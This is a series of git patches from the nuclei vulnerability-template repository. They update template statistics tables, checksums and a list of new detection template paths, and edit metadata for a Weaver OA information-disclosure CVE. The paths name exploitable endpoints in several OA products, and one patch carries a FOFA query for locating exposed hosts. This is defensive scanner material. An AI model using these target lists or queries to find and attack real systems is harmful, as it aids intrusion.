+| aryanic                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| themefusion                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| benjamin                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| iserver                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| opengear                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| rollupjs                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| apex-legends                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| cnet                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| groupib                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| web3storage                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| hanta                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| hubski                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| fastvue                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| newmeet                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| securityspy                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| wifisky                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| completeview                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| intigriti                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| cnzxsoft                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| sitefinity                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| iucn                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| plone                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| hongjing                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| sefile                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| cvnd2023                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| datataker                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| destructoid                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| karabin                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| monday                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| sassy                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| acs                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| shopware                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| mingyu                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| mx                                              |     1 |                                       |       |                      |       |          |       |      |       |
+| floc                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| parler-archived-posts                           |     1 |                                       |       |                      |       |          |       |      |       |
+| teespring                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| coinranking                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| imgsrcru                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| zzzphp                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| arangodb                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| gunicorn                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| strikingly                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| suprema                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| barco                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| supportcandy                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| bigfix                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| c4                                              |     1 |                                       |       |                      |       |          |       |      |       |
+| intelliflash                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| xamr                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| routes                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| payroll                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| opentext                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| xfinity                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| alik                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| internet-archive-user-search                    |     1 |                                       |       |                      |       |          |       |      |       |
+| kerio                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| teltonika                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| aurall                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| profilegrid                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| dxplanning                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| crypto                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| oembed                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| platformio                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| likeevideo                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| openx                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| siterecovery                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| pulmi                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| kemai                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| gigapan                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| erp-nc                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| bacnet                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| buddy                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| speakout                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| bravenewcoin                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| terraboard                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| statistics                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| diablo                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| box                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| chromium                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| simpleclientmanagement                          |     1 |                                       |       |                      |       |          |       |      |       |
+| kaggle                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| eventtickets                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| issuu                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| bestbooks                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| scimono                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| tjws                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| gridx                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| properties                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| requests-baskets                                |     1 |                                       |       |                      |       |          |       |      |       |
+| inaturalist                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| pghero                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| oneinstack                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| connect                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| fedora                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| debounce                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| pony                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| nessus                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| ocomon                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| phpbb                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| argussurveillance                               |     1 |                                       |       |                      |       |          |       |      |       |
+| ellucian                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| vivino                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| zatrybipl                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| zero-spam                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| redgifs                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| utipio                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| ipstack                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| knowage                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| smelsy                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| webctrl                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| kronos                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| drone                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| sarg                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| alloannonces                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| macos-bella                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| jnoj                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| fosstodonorg-mastodon-instance                  |     1 |                                       |       |                      |       |          |       |      |       |
+| giters                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| ebird                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| php-fusion                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| bitcoin                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| piekielni                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| iframe                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| phpminiadmin                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| telecom                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| html2wp                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| sharingsphere                                   |     1 |                                       |       |                      |       |          |       |      |       |
+| dapr                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| isecure                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| caseaware                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| bangresto                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| behat                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| groupware                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| ogugg                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| speed                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| sunbird                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| jinher                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| bagisto                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| ztp                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| cdapl                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| caringbridge                                    |     1 |                                       |       |                      |       |          |       |      |       |
+| mgrng                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| cgit                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| muhttpd                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| self-signed                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| haraj                                           |     1 |                                       |       |                      |       |          |       |      |       |
+| personal-dictionary                             |     1 |                                       |       |                      |       |          |       |      |       |
+| kotburger                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| mastodon-tflnetpl                               |     1 |                                       |       |                      |       |          |       |      |       |
+| admzip                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| buttercms                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| cvsweb                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| ssltls                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| kickstarter                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| amp                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| xvideos-models                                  |     1 |                                       |       |                      |       |          |       |      |       |
+| xds                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| popup-maker                                     |     1 |                                       |       |                      |       |          |       |      |       |
+| h5s                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| awx                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| ecsimagingpacs                                  |     1 |                                       |       |                      |       |          |       |      |       |
+| slideshare                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| privatekey                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| nagios-xi                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| vagrant                                         |     1 |                                       |       |                      |       |          |       |      |       |
+| polchatpl                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| powercommanager                                 |     1 |                                       |       |                      |       |          |       |      |       |
+| mrtg                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| shoretel                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| ind780                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| notificationx                                   |     1 |                                       |       |                      |       |          |       |      |       |
+| acemanager                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| atlantis                                        |     1 |                                       |       |                      |       |          |       |      |       |
+| armorgames                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| boa                                             |     1 |                                       |       |                      |       |          |       |      |       |
+| pinterest                                       |     1 |                                       |       |                      |       |          |       |      |       |
+| tumblr                                          |     1 |                                       |       |                      |       |          |       |      |       |
+| nethermind                                      |     1 |                                       |       |                      |       |          |       |      |       |
+| bing                                            |     1 |                                       |       |                      |       |          |       |      |       |
+| xunchi                                          |     1 |                                       |       |                      |       |          |       |      |       |
diff --git a/TOP-10.md b/TOP-10.md
index 4b9d8d5e7e..0b498e189a 100644
--- a/TOP-10.md
+++ b/TOP-10.md
@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR    | COUNT |      DIRECTORY       | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
-| cve       |  2054 | dhiyaneshdk  |  1056 | http                 |  6342 | info     |  3217 | file |   309 |
-| panel     |   985 | dwisiswant0  |   798 | file                 |   309 | high     |  1288 | dns  |    17 |
-| wordpress |   831 | daffainfo    |   787 | workflows            |   191 | medium   |  1270 |      |       |
-| exposure  |   784 | pikpikcu     |   353 | network              |   116 | critical |   785 |      |       |
-| xss       |   726 | pussycat0x   |   289 | ssl                  |    26 | low      |   230 |      |       |
+| cve       |  2065 | dhiyaneshdk  |  1059 | http                 |  6462 | info     |  3225 | file |   309 |
+| panel     |   988 | dwisiswant0  |   798 | file                 |   309 | high     |  1346 | dns  |    17 |
+| wordpress |   832 | daffainfo    |   787 | workflows            |   191 | medium   |  1284 |      |       |
+| exposure  |   791 | pikpikcu     |   353 | network              |   116 | critical |   824 |      |       |
+| xss       |   730 | pussycat0x   |   291 | ssl                  |    26 | low      |   231 |      |       |
 | wp-plugin |   721 | pdteam       |   283 | dns                  |    17 | unknown  |    29 |      |       |
-| osint     |   672 | ritikchaddha |   259 | headless             |     9 |          |       |      |       |
+| osint     |   675 | ritikchaddha |   261 | headless             |     9 |          |       |      |       |
 | tech      |   632 | ricardomaia  |   225 | TEMPLATES-STATS.json |     1 |          |       |      |       |
-| edb       |   598 | geeknik      |   221 | contributors.json    |     1 |          |       |      |       |
-| lfi       |   587 | 0x_akoko     |   179 | cves.json            |     1 |          |       |      |       |
+| lfi       |   601 | geeknik      |   221 | contributors.json    |     1 |          |       |      |       |
+| edb       |   598 | 0x_akoko     |   179 | cves.json            |     1 |          |       |      |       |

From 6aceb310ab5dec0f7ce3d54974817f01af24acde Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 17:38:03 +0000
Subject: [PATCH 0438/1090] Auto README Update [Mon Sep 18 17:38:03 UTC 2023]
 :robot:

---
 README.md | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/README.md b/README.md
index 52cbb93694..306bcd56b7 100644
--- a/README.md
+++ b/README.md
@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR    | COUNT |      DIRECTORY       | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
-| cve       |  2054 | dhiyaneshdk  |  1056 | http                 |  6342 | info     |  3217 | file |   309 |
-| panel     |   985 | dwisiswant0  |   798 | file                 |   309 | high     |  1288 | dns  |    17 |
-| wordpress |   831 | daffainfo    |   787 | workflows            |   191 | medium   |  1270 |      |       |
-| exposure  |   784 | pikpikcu     |   353 | network              |   116 | critical |   785 |      |       |
-| xss       |   726 | pussycat0x   |   289 | ssl                  |    26 | low      |   230 |      |       |
+| cve       |  2065 | dhiyaneshdk  |  1059 | http                 |  6462 | info     |  3225 | file |   309 |
+| panel     |   988 | dwisiswant0  |   798 | file                 |   309 | high     |  1346 | dns  |    17 |
+| wordpress |   832 | daffainfo    |   787 | workflows            |   191 | medium   |  1284 |      |       |
+| exposure  |   791 | pikpikcu     |   353 | network              |   116 | critical |   824 |      |       |
+| xss       |   730 | pussycat0x   |   291 | ssl                  |    26 | low      |   231 |      |       |
 | wp-plugin |   721 | pdteam       |   283 | dns                  |    17 | unknown  |    29 |      |       |
-| osint     |   672 | ritikchaddha |   259 | headless             |     9 |          |       |      |       |
+| osint     |   675 | ritikchaddha |   261 | headless             |     9 |          |       |      |       |
 | tech      |   632 | ricardomaia  |   225 | TEMPLATES-STATS.json |     1 |          |       |      |       |
-| edb       |   598 | geeknik      |   221 | contributors.json    |     1 |          |       |      |       |
-| lfi       |   587 | 0x_akoko     |   179 | cves.json            |     1 |          |       |      |       |
+| lfi       |   601 | geeknik      |   221 | contributors.json    |     1 |          |       |      |       |
+| edb       |   598 | 0x_akoko     |   179 | cves.json            |     1 |          |       |      |       |
 
-**487 directories, 7254 files**.
+**502 directories, 7374 files**.
 
 
 

From 1fff1152890f97acef1b54bee081c8ffe11fc41e Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 18:12:44 +0000
Subject: [PATCH 0439/1090] Auto Generated New Template Addition List [Mon Sep
 18 18:12:44 UTC 2023] :robot:

---
 .new-additions | 122 +------------------------------------------------
 1 file changed, 1 insertion(+), 121 deletions(-)

diff --git a/.new-additions b/.new-additions
index 340f789aed..f9bf1478af 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,121 +1 @@
-http/cnvd/2021/CNVD-2021-33202.yaml
-http/cnvd/2022/CNVD-2022-43245.yaml
-http/cnvd/2023/CNVD-C-2023-76801.yaml
-http/cves/2022/CVE-2022-0342.yaml
-http/cves/2023/CVE-2023-22463.yaml
-http/cves/2023/CVE-2023-25573.yaml
-http/cves/2023/CVE-2023-2813.yaml
-http/cves/2023/CVE-2023-30943.yaml
-http/cves/2023/CVE-2023-37629.yaml
-http/cves/2023/CVE-2023-39676.yaml
-http/cves/2023/CVE-2023-39677.yaml
-http/cves/2023/CVE-2023-41892.yaml
-http/cves/2023/CVE-2023-4714.yaml
-http/default-logins/d-link/dlink-centralized-default-login.yaml
-http/default-logins/o2oa/o2oa-default-login.yaml
-http/default-logins/others/aruba-instant-default-login.yaml
-http/default-logins/others/ciphertrust-default-login.yaml
-http/default-logins/others/cnzxsoft-default-login.yaml
-http/default-logins/others/supershell-default-login.yaml
-http/default-logins/seeyon/seeyon-a8-default-login.yaml
-http/default-logins/seeyon/seeyon-monitor-default-login.yaml
-http/default-logins/smartbi/smartbi-default-login.yaml
-http/default-logins/wayos/ac-weak-login.yaml
-http/exposed-panels/dbgate-panel.yaml
-http/exposed-panels/phpldapadmin-panel.yaml
-http/exposed-panels/quilium-panel.yaml
-http/exposed-panels/satis-repository.yaml
-http/exposed-panels/symantec/symantec-phishing-panel.yaml
-http/misconfiguration/gitlab/gitlab-public-registration.yaml
-http/osint/hackenproof.yaml
-http/osint/intigriti.yaml
-http/osint/yeswehack.yaml
-http/vulnerabilities/chanjet-tplus-rce.yaml
-http/vulnerabilities/dbgate-unauth-rce.yaml
-http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
-http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
-http/vulnerabilities/other/aic-intelligent-password-exposure.yaml
-http/vulnerabilities/other/cloud-oa-system-sqli.yaml
-http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml
-http/vulnerabilities/other/comai-ras-cookie-bypass.yaml
-http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml
-http/vulnerabilities/other/phpldapadmin-xss.yaml
-http/vulnerabilities/other/sanhui-smg-file-read.yaml
-http/vulnerabilities/other/seeyon-oa-log4j.yaml
-http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml
-http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
-http/vulnerabilities/realor/realor-gwt-system-sqli.yaml
-http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
-http/vulnerabilities/sangfor/sangfor-login-rce.yaml
-http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
-http/vulnerabilities/seeyon/seeyon-config-exposure.yaml
-http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
-http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml
-http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml
-http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml
-http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
-http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml
-http/vulnerabilities/smartbi/smartbi-deserialization.yaml
-http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml
-http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
-http/vulnerabilities/tongda/tongda-api-file-upload.yaml
-http/vulnerabilities/tongda/tongda-arbitrary-login.yaml
-http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml
-http/vulnerabilities/tongda/tongda-getdata-rce.yaml
-http/vulnerabilities/tongda/tongda-getway-rfi.yaml
-http/vulnerabilities/tongda/tongda-insert-sqli.yaml
-http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml
-http/vulnerabilities/tongda/tongda-meeting-unauth.yaml
-http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml
-http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
-http/vulnerabilities/tongda/tongda-video-file-read.yaml
-http/vulnerabilities/topsec/topsec-topacm-rce.yaml
-http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
-http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml
-http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml
-http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml
-http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml
-http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml
-http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml
-http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml
-http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml
-http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
-http/vulnerabilities/weaver/ecology/ecology-oa-byxml-xxe.yaml
-http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
-http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
-http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
-http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
-http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
-http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
-http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
-http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
-http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
-http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
-http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
-http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
-http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
-http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
-http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
-http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml
-http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml
-http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
-http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
-http/vulnerabilities/weaver/weaver-userselect-unauth.yaml
-http/vulnerabilities/wechat/wechat-info-leak.yaml
-http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
-http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
-http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
-http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
-http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
-http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml
-http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
-http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
-http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
-http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
-http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
-http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
-http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
-http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
-http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
-http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
-http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml
+http/exposures/tokens/jotform/jotform-api-key.yaml

From 4ad77a46c78c85c794b19c8ce50137d98cf5a330 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 18:13:06 +0000
Subject: [PATCH 0440/1090] Auto Generated Templates Checksum [Mon Sep 18
 18:13:06 UTC 2023] :robot:

---
 templates-checksum.txt | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 0a7f227fd9..956df6f9f8 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593
 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71
 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df
 PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7
-README.md:dd1fa7e282ecfc701893c864747b2cb4fc8ef3bc
+README.md:306c218b46b2a3aa6dbb75d22e6f2e68f3bf7732
 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26
-TEMPLATES-STATS.json:46e94935eba8934af2bfd77e17dd4bb352a4ec0d
-TEMPLATES-STATS.md:3f74e66db0aeaf37e1b9d401f4d8fc23bc8a059f
-TOP-10.md:d9e01f12d3aad16e5a340a0d8d59a87dc902e62c
+TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
+TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
+TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
 cves.json:a1e9432abfa90bc1b48c05fa1278519b055862dc
 cves.json-checksum.txt:7b5ad7d2d0751827d6679f426171b866ab275d0f
@@ -4158,6 +4158,7 @@ http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml:8cb94174c5f8916b
 http/exposures/tokens/hashicorp/hashicorp-token.yaml:bfbb5c35ab8a7a2229402793063acdcfd492f66a
 http/exposures/tokens/heroku/heroku-api-key.yaml:30b4cddecd0c9b8f41d8d13f7badd0251bd6bd1a
 http/exposures/tokens/jenkins/jenkins-crumb-token.yaml:693bb51593134063bd266b19573f3e0a5c8fa74a
+http/exposures/tokens/jotform/jotform-api-key.yaml:aaa3d0bcb2d84ed626286013f99c1de7cc7e1be2
 http/exposures/tokens/loqate/loqate-api-key.yaml:6f3c072743f3fe4f8fe67365e2aab7a873b0da19
 http/exposures/tokens/mailchimp/mailchimp-api-key.yaml:264061c78e2406ad2e85ce9682cc889c97d8f663
 http/exposures/tokens/mailgun/mailgun-api-token.yaml:6c37364bdf78e0e98b5694ac777a5b8f20a8a5dd
@@ -7179,7 +7180,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:12579d9a1630c352f6bd03fb5b315b54c10b4471
+templates-checksum.txt:94a712cdc5e70192f505d6c4cb513b68d185c359
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 6335a4e3a06342eb05d4e9132205cb7ad8e7e314 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 18 Sep 2023 23:47:32 +0530
Subject: [PATCH 0441/1090] matcher and info update

---
 http/cves/2023/CVE-2023-2766.yaml | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml
index f52ea663bc..bb9dc4c5e7 100644
--- a/http/cves/2023/CVE-2023-2766.yaml
+++ b/http/cves/2023/CVE-2023-2766.yaml
@@ -1,18 +1,24 @@
 id: CVE-2023-2766
 
 info:
-  name: OA E-Office jx2_config.ini - Information Leakage
+  name: Weaver OA 9.5 - Information Disclosure
   author: DhiyaneshDK
   severity: high
   description: |
     A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.
   reference:
     - https://github.com/8079048q/cve/blob/main/weaveroa.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2766
+  classification:
+    cve-id: CVE-2023-2766
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-552
   metadata:
     max-request: 1
-    fofa-query: app="泛微-EOffice"
     verified: true
-  tags: cve,cve2023,e-office,info-leak
+    fofa-query: app="泛微-EOffice"
